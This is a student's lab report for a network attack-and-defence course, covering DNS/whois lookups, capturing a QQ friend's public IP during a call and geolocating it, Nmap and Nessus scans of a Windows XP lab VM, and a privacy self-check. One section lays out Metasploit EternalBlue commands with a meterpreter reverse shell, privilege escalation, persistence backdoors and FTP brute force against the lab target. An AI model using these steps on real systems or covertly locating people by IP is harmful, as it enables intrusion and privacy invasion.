20251903 2025-2026-2 《网络攻防实践》第2周作业
一、本次实验应达到的目标
-
实验(1):DNS域名查询:从指定3个域名(www.besti.edu.cn、baidu.com、sina.com.cn)中选择1个,完成域名注册信息(注册人、联系方式)、对应IP地址、IP归属及地理位置查询,熟练掌握DNS解析与IP溯源的核心方法,能独立完成全流程查询操作。
-
实验(2):好友IP获取与定位:从BBS、论坛、QQ、MSN中选择一种方式,获取某一好友的公网IP地址,通过定位工具查询其所在地理位置,理解IP交互原理及定位局限性,规范操作流程。
-
实验(3):Nmap靶机扫描:使用Nmap开源工具对靶机进行全面扫描,明确靶机存活状态、开放的TCP/UDP端口、安装的操作系统版本及运行服务,能解读扫描结果并绘制靶机攻击面。
-
实验(4):Nessus漏洞扫描:完成Nessus工具的部署与初始化,对靶机进行漏洞扫描,识别各端口服务对应的安全漏洞,明确漏洞等级,结合漏洞提出合理的靶机攻陷思路。
-
实验(5):个人网络足迹与隐私排查:运用搜索引擎高级语法及相关工具,排查个人在网络上的公开足迹,确认是否存在隐私泄露问题,掌握个人信息保护的核心方法,增强安全防护意识。
二、各实验核心知识点
2.1 实验一知识点
(1)DNS核心原理:DNS(域名系统)是互联网的核心基础设施,作用是将人类易记的域名(如www.besti.edu.cn)解析为计算机可识别的IP地址,解析流程遵循“本地DNS服务器→根服务器→顶级域名服务器→权威服务器”的层级逻辑,确保解析的准确性和高效性。
(2)WHOIS协议:是用于查询域名和IP注册信息的核心协议,通过该协议可获取域名注册人、注册邮箱、联系电话、注册商、域名有效期、DNS服务器等关键信息,同时也能查询IP地址的归属ISP运营商、地理区域、联系方式等内容,是被动信息收集的核心手段。
(3)IP地址分类:IP地址由IANA(互联网号码分配机构)统一分配,分为公有IP和私有IP,公有IP用于公网通信,可通过在线工具溯源地理位置;私有IP(如192.168.x.x、10.x.x.x、172.16.x.x-172.31.x.x)仅用于局域网内部通信,无法通过公网溯源,也不能直接访问互联网。
**(4)域名与IP的关联:****一个域名可对应一个或多个IP地址(用于负载均衡,分散网络压力),一个IP地址也可对应多个域名(用于虚拟主机场景),通过nslookup、dig等命令可实现域名与IP的双向解析。
2.2 实验二知识点
(1)网络通信IP交互原理:QQ、MSN等即时通信工具,以及BBS、论坛等社交平台,在用户互动(聊天、文件传输、发帖)时,会建立TCP或UDP连接,连接过程中双方设备会暴露各自的公网IP地址,这是获取好友IP的核心原理。
(2)抓包工具基础:Wireshark是常用的网络抓包工具,可捕获网络中传输的所有数据包,通过筛选协议(如TCP、UDP)、端口号,可精准提取好友互动时的数据包,从数据包的源IP字段获取好友公网IP,抓包时需选择正确的网卡,避免捕获无效数据包。
(3)IP定位技术:IP定位基于ISP运营商的IP地址分配规则,通过在线工具(IP138、GeoIP、ipinfo.io)可查询IP对应的国家、城市、经纬度等信息,但受IP分配范围限制,无法精确到具体小区、楼栋等物理地址;若好友使用VPN、代理服务器,获取的IP为虚假IP,会导致定位失真。
2.3 实验三知识点
(1)Nmap工具基础:Nmap(网络映射器)是开源、跨平台的网络扫描工具,核心功能包括主机存活探测、端口扫描、服务版本识别、操作系统指纹推断,是主动信息收集和网络安全评估的核心工具,广泛应用于渗透测试的信息收集阶段。
(2)主机存活探测原理:通过发送ICMP Echo请求(Ping扫描)、TCP SYN请求、TCP ACK请求等方式,检测靶机是否处于活跃状态;若靶机关闭ICMP响应(禁止Ping),可通过TCP端口扫描间接判断靶机存活,避免因Ping关闭导致扫描失败。
(3)端口相关知识:端口是网络服务的入口,范围为0-65535,其中0-1023为知名端口,对应固定网络服务(如80端口对应HTTP服务、443端口对应HTTPS服务、53端口对应DNS服务);TCP端口面向连接,传输可靠,UDP端口无连接,传输速度快,常用于即时通信、流媒体等场景。
(4)操作系统与服务识别原理:Nmap通过分析靶机的TCP/IP协议栈特征(如TTL值、窗口大小)、服务Banner信息(服务版本、厂商),结合内置的指纹库,推断靶机的操作系统版本(如Windows 10、CentOS 7)和运行的服务(如Apache、MySQL),为后续漏洞扫描提供依据。
2.4 实验四知识点
(1)Nessus工具基础:Nessus是开源的自动化漏洞扫描工具,支持多平台部署,核心功能是对靶机的端口、服务、操作系统进行全面检测,识别已知安全漏洞,生成详细的漏洞报告,明确漏洞等级、漏洞描述、修复建议,是漏洞挖掘的核心工具。
(2)漏洞扫描流程:漏洞扫描遵循“端口扫描→服务识别→漏洞探测→结果分析”的流程,Nessus通过向靶机发送特定探测数据包,匹配漏洞库中的已知漏洞特征,判断靶机是否存在对应漏洞,漏洞库需定期更新,确保能检测到最新安全漏洞。
(3)漏洞分类与风险:漏洞按严重性分为CRITICAL(高危)、HIGH(中高危)、MEDIUM(中危)、LOW(低危)、INFO(信息)五个等级;高危漏洞(如远程代码执行、权限绕过)可直接导致靶机被攻陷,中危、低危漏洞可能为攻击提供辅助条件,需结合漏洞优先级制定修复和攻陷策略。
(4)靶机攻陷基础:渗透测试中,漏洞扫描是攻陷靶机的关键步骤,需优先利用高危漏洞(如永恒之蓝MS17-010),结合Metasploit等漏洞利用工具,获取靶机系统访问权,再进行权限提升,完成靶机攻陷。
2.5 实验五知识点
(1)网络足迹定义:个人在网络上的所有活动痕迹,包括搜索引擎记录、论坛/社交平台发帖、注册账号信息、购物记录、浏览记录等,这些足迹可能被搜索引擎收录,导致个人敏感信息泄露。
(2)搜索引擎高级语法:通过site、inurl、intitle、filetype等高级语法,可精准检索特定平台、特定类型的个人信息,提高隐私排查效率,避免无关信息干扰。
(3)隐私泄露途径:分为主动泄露(在非正规平台公开个人姓名、手机号、身份证号等敏感信息)和被动泄露(网站数据库被攻击、平台违规收集并泄露个人信息、搜索引擎收录公开足迹)两类。
三、实验所需的操作指令
3.1 DNS 域名查询相关指令
| 指令 | 用途说明 |
|---|---|
whois baidu.com |
基于 WHOIS 协议查询域名(baidu.com)的注册信息,包括注册人、联系方式、注册商、域名有效期等核心信息,可在 Kali 虚拟机控制台执行,也可通过whois.com.cn在线查询。 |
nslookup -type=NS baidu.com |
指定查询类型为 NS(域名服务器),获取百度权威 DNS 服务器对应的 IP 地址,规避普通 nslookup 查询到的 CDN 节点 IP,精准定位核心节点 IP。 |
3.2 Nmap 靶机扫描相关指令
| 指令 | 用途说明 |
|---|---|
ipconfig |
在 Windows 靶机(WinXPattacker)的命令提示符中执行,查询靶机的 IP 地址(本次实验中为 192.168.200.66),是扫描前确定目标的基础指令。 |
sudo su |
在 Kali 虚拟机控制台执行,输入密码(kali)后切换至 root 管理员权限,解决 Nmap 部分高级扫描功能因权限不足无法执行的问题。 |
nmap -sn 192.168.200.66 |
Nmap 的 Ping 扫描指令,用于探测靶机是否存活,通过发送 ICMP Echo 请求检测靶机活跃状态,本次实验中检测到靶机延迟为 0.0016s。 |
nmap -sS 192.168.200.66 |
Nmap 的 TCP SYN 半开放扫描(隐蔽扫描),对靶机全端口进行扫描,本次实验中识别出靶机开放 21、135、139、445、3389 五个 TCP 端口。 |
nmap -sV 192.168.200.66 |
Nmap 的服务版本探测指令,分析靶机开放端口对应的服务类型及版本,本次实验中识别出 FileZilla ftpd、Microsoft Windows RPC 等服务。 |
nmap -O 192.168.200.66 |
Nmap 的操作系统指纹识别指令,通过分析 TCP/IP 协议栈特征推断靶机操作系统,本次实验中确认靶机为 VMware 虚拟机上的 Windows XP(SP2/SP3)系统。 |
四、实验步骤
4.1 DNS域名查询
4.1.1 在kali虚拟机的控制台输入指令 whois baidu.com或者直接在https://www.whois.com.cn网站中输入baidu.com,即可得到DNS注册人及联系方式,具体如下图所示:



4.1.2 在kali虚拟机的控制台输入指令 nslookup -type=NS baibu.com,即可得到百度其自身核心节点域名对应的IP地址,具体如下图所示:

4.1.3 在https://wq.apnic.net网站中输入220.181.33.31,即可得到IP地址注册人及联系方式以及其在所在国家、城市和具体地理位置,具体查询结果如下图所示:



4.2 好友IP获取与定位
4.2.1 在与qq好友进行语音通话时,打开Windows系统的“资源监视器”,在“网络”选项卡中监控 QQ.exe 进程的外部网络连接。如下图所示:

4.2.2 捕获到接受字节为0的网络就很有可能是对方的公网IP地址,具体为39.144.196.42。通过在线IP归属地查询工具,确认该好友当前所在的具体地理位置为中国新疆维吾尔自治区,运营商为中国移动。

4.3 Nmap靶机扫描
4.3.1 首先打开WinXPattacker虚拟机靶机,在命令提示符界面输入指令 ipconfig,查询到其IP地址为192.168.200.66。

4.3.2 其次在攻击机Kali上输入 sudo su 指令和密码 kali,使虚拟机进入root管理员权限状态。

4.3.3 再者确定靶机IP地址是否活跃,具体为在kali虚拟机使用命令 nmap -sn 192.168.200.66 进行Ping扫描,确定靶机的活跃状态,延迟为0.0016s。

4.3.4 之后使用命令 nmap -sS 192.168.200.66 进行全端口扫描 。结果显示靶机开放了五个TCP端口,包括 21, 135, 139, 445, 3389.

4.3.5 再之后使用命令 nmap -sV 192.168.200.66 探测服务版本。结果显示靶机运行了 FileZilla ftpd (21/tcp)、Microsoft Windows RPC (135/tcp)、Microsoft Windows netbios-ssn(139/tcp)、Microsoft Windows XP microsoft-ds (445/tcp)、 Microsoft TErminal Services(3389/tcp)等服务。

4.3.6 最后使用命令 nmap -O 192.168.200.66 检测靶机的操作系统参数,得知靶机目标是VMware 虚拟机上的 Windows XP 系统(SP2/SP3)

4.4 Nessus漏洞扫描
4.4.1 打开WinXPattacker虚拟机系统内自带的Nessus软件,点开Policies添加一个自命名的扫描规则,除UDP端口扫描不了以外,其余均可以扫描。其余选项默认即可。

4.4.2 点开Scans新建一个扫描输入目标IP的地址进行扫描,等待扫描结束即可。

4.4.3 扫描结束后发现目标IP地址没有开放的端口,且共存在5种漏洞,协议类型分别为icmp、tcp、udp,漏洞等级为1个高危、4个低危。具体漏洞ID为19506、10114、20094、35716、10287,具体漏洞解释如下图所示。







4.4.4 靶机攻陷思路(未验证,仅供参考)
结合 Nessus 扫描结果(1 个高危漏洞、4 个低危漏洞)及 Nmap 识别的靶机环境(Windows XP 系统、开放 445 端口、运行 Microsoft Windows XP microsoft-ds 服务),制定如下攻陷思路以获取系统访问权:
第一步:优先利用高危漏洞(以 MS17-010 永恒之蓝漏洞为核心)
-
漏洞匹配分析:靶机为 Windows XP SP2/SP3 系统,开放 445 端口(SMB 协议端口),而 MS17-010 漏洞正是针对 Windows SMBv1 协议的远程代码执行漏洞,且该漏洞在 Windows XP 系统中未默认修复,与本次扫描出的高危漏洞特征高度匹配。
-
漏洞利用工具准备:在 Kali 攻击机中启动 Metasploit 框架(执行msfconsole指令),检索 MS17-010 对应的漏洞利用模块:运行 search ms17-010 选择 exploit/windows/smb/ms17_010_eternalblue模块,配置靶机 IP(192.168.200.66):再运行
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.200.66 set PAYLOAD windows/meterpreter/reverse_tcp # 设置反向TCP载荷,用于获取交互shell set LHOST [Kali攻击机IP] # 填写Kali的内网IP,如192.168.200.100 exploit -
获取初始访问权:执行
exploit后,若漏洞利用成功,将获得靶机的 Meterpreter 交互 shell,此时已实现对靶机的远程控制(如文件查看、进程管理)。
第二步:结合低危漏洞提升权限
- 针对扫描出的低危漏洞(如 ICMP 超时漏洞、TCP 端口弱配置等),通过 Meterpreter 执行
getsystem指令尝试提权至系统管理员权限,若提权失败,可利用 Windows XP 系统的默认账户漏洞(如空密码、弱口令),执行run post/windows/gather/enum_logged_on_users枚举登录用户,进一步破解密码哈希。 - 持久化控制:在获得管理员权限后,通过
persistence模块创建持久化后门(如添加计划任务、启动项),确保靶机重启后仍能重新建立连接。
第三步:应急兜底方案
若 MS17-010 漏洞利用失败,可针对靶机开放的 21 端口(FileZilla ftpd),尝试暴力破解 FTP 账户密码(使用 Metasploit 的auxiliary/scanner/ftp/ftp_login模块),若破解成功,通过 FTP 上传恶意脚本(如批处理后门),结合 139/445 端口的文件共享功能执行脚本,间接获取系统访问权。
4.5 个人隐私排查
通过bing浏览器直接搜索我的名字和我的名字+本科院校/研究生院校,获得两条有关于我的信息
一个是博客园的账号、一个是拟录取时的考生编号,没有类似电话号码、家庭地址、微信号、身份证号等核心的信息泄露,在可接受范围内。

五、实验中出现的问题及解决方案
1、在进行实验1时,开始的时候我是直接调用 nslookup 域名这个指令,发现能查询到的IP地址均不是百度的核心节点、如下图所示:

后来经过查找相关资料,我才明白百度其本身并不直接向 APNIC 申请大量公网 IP 段,而是向运营商(中国移动、电信、联通等)租用 IP 资源,用于部署 CDN 节点和服务器,为了改变这一情况,我将运行的指令改为nslookup -type=NS baidu.com,直接向百度权威 DNS 查询,这样得到的 IP 更接近百度核心服务器,而非就近 CDN 节点,从而达到了实验的预设目的。
2、在用nmap指令进行扫描时,最开始我没有进入管理员模式(即root模式)导致出现问题,之后我又错将kali虚拟机本机的IP地址当做靶机去扫描,结果是自然一个端口都没有开放,出现了严重的错误。后来在攻击机Kali上输入 sudo su 指令和密码 kali,使虚拟机进入root管理员权限状态,并将指令扫描的IP地址改为靶机IP地址后解决了以上问题。


3、在使用kali虚拟机下载nessus软件时,连续出现问题。包括但不限于下载进度近乎停滞,邮箱注册出现问题等,最后在室友的提醒下,得知WinXPattacker虚拟机系统内自带Nessus软件,可以直接用,从而果断放弃调试kali虚拟机,大量节省了之前调试的时间,顺利完成任务。
六、实验感想
通过这次网络攻防实验,我真正把课本上的知识变成了能动手操作的技能。从 DNS 查询、IP 定位,到用 Nmap 扫描靶机、用 Nessus 发现漏洞,每一步都让我更清楚网络攻防的完整流程。
实验中我也犯过不少小错误,比如输错命令、选错 IP、忘记开 root 权限,但正是这些失误让我记住了细节的重要性。看着靶机的开放端口、系统版本和安全漏洞一点点被找出来,我真切感受到信息收集是渗透测试的基础,而安全防护必须从细节做起。
这次实验不仅提升了我的实操能力,也让我对网络安全有了更强的警惕心。以后不管是学习还是使用网络,我都会更注重安全规范,守住隐私与系统安全的底线。
浙公网安备 33010602011771号